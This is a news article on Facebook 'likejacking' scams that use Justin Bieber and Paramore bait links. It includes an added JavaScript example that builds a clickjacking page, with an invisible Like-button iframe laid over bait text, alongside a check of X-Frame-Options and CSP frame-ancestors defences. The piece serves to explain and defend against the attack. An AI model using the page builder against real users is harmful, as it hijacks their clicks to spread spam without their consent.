Earlier this week, we reported on a new Facebook clickjacking scheme that takes advantage of the service’s “Like” buttons; today a variation of that attack is starting to appear, this time using Justin Bieber as bait.
While the baited links in the last attack were focused on sensational, if generic, titles like, “LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE,” the new vector takes advantage of the popularity of YouTube star Bieber, as well as Paramore lead singer Hayley Williams.
The targeted links display text that says either “Paramore n-a-k-ed photo leaked” or “Justin Biebers Phone Number Leaked!” In the case of the Paramore clickjack, users are taken to a page that says “Click here to continue if you are 18 years of age or above.” A Facebook Like button sits in an invisible iframe overlaid on that page, so clicking anywhere on it actually clicks the Like button, which posts the link to the victim’s profile and news feed and spreads it to more and more users.
The Justin Bieber vector is even more clever. First, it takes you to a page that says “Click here to continue”; the invisible Facebook Like button is positioned over that text. After clicking, users are shown what purports to be Bieber’s phone number and address, so the page appears to deliver what it promised and the hijacked Like goes unnoticed.
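To make the mechanism concrete, here is an added example (not code from the original article or from the attackers it describes) that does two things: it builds the skeleton of a “likejacking” page as the article describes it, with a transparent iframe containing a Like button positioned over the bait text, and it implements the browser-side framing decision that a framed page can control through its response headers (X-Frame-Options and the CSP frame-ancestors directive). The Like button plugin URL, the origin names and the bait URL are assumptions for illustration; the code runs under Node without a browser.

```javascript
// Added example, not the article's own material. Shows (1) the page
// structure behind a likejacking attack and (2) the header-based framing
// policy that lets a page refuse to be framed by an attacker's site.

// Facebook's Like button was embedded as an iframe pointing at a plugin
// URL; this exact URL is an assumption for illustration only.
const LIKE_BUTTON_URL = "https://www.facebook.com/plugins/like.php?href=";

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Build the attacker's page: visible bait text plus a Like button iframe
// with opacity:0 placed at the same coordinates. The frame is invisible but
// still receives the click, so "Click here to continue" becomes a Like
// for baitUrl on the victim's profile.
function buildLikejackPage(baitUrl, baitText) {
  const src = LIKE_BUTTON_URL + encodeURIComponent(baitUrl);
  return [
    "<!doctype html><html><body>",
    `<div id="bait" style="position:absolute;top:100px;left:100px;font-size:24px;">${escapeHtml(baitText)}</div>`,
    `<iframe src="${src}" scrolling="no" frameborder="0"`,
    ' style="position:absolute;top:100px;left:100px;width:120px;height:30px;opacity:0;z-index:10;"></iframe>',
    "</body></html>",
  ].join("\n");
}

// Match one CSP frame-ancestors host source (origin or https://*.host form)
// against the embedding page's origin. A deliberate subset of the CSP grammar.
function matchesSource(source, embedderOrigin) {
  if (!source.includes("*")) return source === embedderOrigin;
  const [scheme, host] = source.split("://");
  const [eScheme, eHost] = embedderOrigin.split("://");
  if (scheme !== eScheme || !host || !host.startsWith("*.")) return false;
  return eHost.endsWith(host.slice(1)); // "*.partner.test" -> ".partner.test"
}

// Decide whether a browser should render `pageOrigin`'s response inside a
// frame owned by `embedderOrigin`, given that response's headers.
// CSP frame-ancestors takes precedence over X-Frame-Options when present.
function isFrameable(headers, pageOrigin, embedderOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  pageOrigin = pageOrigin.toLowerCase();
  embedderOrigin = embedderOrigin.toLowerCase();

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(s => s.trim())
      .find(s => s.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, "").toLowerCase());
      if (sources.includes("none")) return false;
      return sources.some(s =>
        s === "*" ||
        (s === "self" && embedderOrigin === pageOrigin) ||
        matchesSource(s, embedderOrigin));
    }
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return embedderOrigin === pageOrigin;
  // No framing policy at all: the state that makes clickjacking possible.
  return true;
}

// Stand-alone demo with constructed inputs.
const page = buildLikejackPage("http://bait.example.test/bieber-number", "Click here to continue");
console.log(page);
console.log("framable with no headers:",
  isFrameable({}, "https://www.facebook.com", "http://bait.example.test"));
console.log("framable with DENY:",
  isFrameable({ "X-Frame-Options": "DENY" }, "https://www.facebook.com", "http://bait.example.test"));
```

The point of the second half is that the defense belongs to the framed page, not to the page doing the framing: a site that never needs to be embedded should send `X-Frame-Options: DENY` (or `Content-Security-Policy: frame-ancestors 'none'`), and the browser then refuses to render it inside the attacker's iframe regardless of opacity or positioning. A widget that exists to be embedded on arbitrary sites, as the Like button does, cannot use that header, which is why the article can only hope for changes on Facebook's side rather than a header fix.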
Unlike the previous attack, this clickjacking attack, or “likejacking” as some are calling it, does not appear to have any malware or worms embedded on the serving websites. Still, if you or someone you know falls victim to these fake links, remove them from the “Likes and Interests” section of your Facebook profile page.
As far as clickjacking techniques go, abusing the Facebook Like button iframe is one of the more clever methods we’ve seen. We hope Facebook can address this issue and tighten how the Like button behaves when it is framed by a third-party page, lest we all become inundated with spammy “Likes” across our news feeds.